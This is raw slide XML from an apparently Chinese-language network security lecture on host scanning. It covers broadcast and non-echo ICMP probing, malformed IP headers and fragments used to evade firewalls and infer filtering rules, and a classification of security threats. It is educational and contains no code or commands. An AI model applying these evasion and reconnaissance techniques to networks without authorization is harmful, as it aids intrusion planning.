              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址设为广播地址或网络地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，可探测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>广播域或整个网络范围内的主机。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缺点：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>只适合于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UNIX/Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会忽略这种请求包；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这种扫描方式容易引起广播风暴</a:t>
            </a:r>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D918763A-3B10-40C1-BFC3-0496AE66DF55}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309250" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Broadcast ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>问询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>应答</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包探</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测，如：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Stamp Request(Type 13)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Reply(Type 14)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Information Request(Type 15)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Reply(Type 16)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Address Mask Request (Type 17)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Reply(Type 18)</a:t>
            </a:r>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7AF1FF59-BE09-4724-9778-2B0CDDFE572B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311298" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Non-Echo ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</a:t>
            </a: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59832" y="1303621"/>
            <a:ext cx="5081260" cy="4881376"/>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防火墙和网络过滤设备常导致传统的探测手段变得无效。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如简单拦截、过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>报文</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>协议提供网络间传送错误信息的手段：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>异常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包头</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>头中设置无效的字段值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>错误的数据分片</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过超长包探测内部路由器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反向映射探测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用防火墙等的方向性，易</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>出难</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>进</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>传统扫描，由外向内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>高级扫描，由内向外</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313346" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主机扫描技术－高级技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C12B9371-9D74-4079-B7F8-07D375E8763E}"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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>扫描器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的基本工作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>投石问路</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 3" descr="ss copy"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763688" y="2109559"/>
            <a:ext cx="5544616" cy="4343777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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传统技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Echo-Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，其他类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>容易被防火墙、其他过滤设备拦截</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>高级技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>利用防火墙方向性，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>易出难</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>进</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>构造有问题的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>接收方用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议向发送方传送错误信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主机扫描</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dirty="0" smtClean="0"/>
              <a:t>从信息流动的角度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中断、截取、修改、捏造</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>从威胁的来源看可分为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>内部威胁和外部威胁 。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>自然和人为两类。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>从攻击者的行为上看可以分成</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>主动威胁和被动威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>从威胁的动机上看分为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>偶发性威胁与故意性威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全威胁分类 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>向目标主机发送包头错误的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>常见的伪造错误字段为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Header Length Field </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP Options Field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标主机或过滤设备会反馈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP Parameter Problem Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>RFC1122</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>规定：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主机应该检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Version Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Checksum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>路由器应该检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Checksum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>字段。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不同厂家的路由器和操作系统对这些错误的处理方式不同，返回的结果也各异。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如果结合其它手段，可以初步判断目标系统所在网络过滤设备的访问列表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315394" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>异常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包头</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C5BD174F-D79D-4ED5-A03C-B57E68FA14A2}"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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>向目标主机</a:t>
            </a:r>
            <a:r>
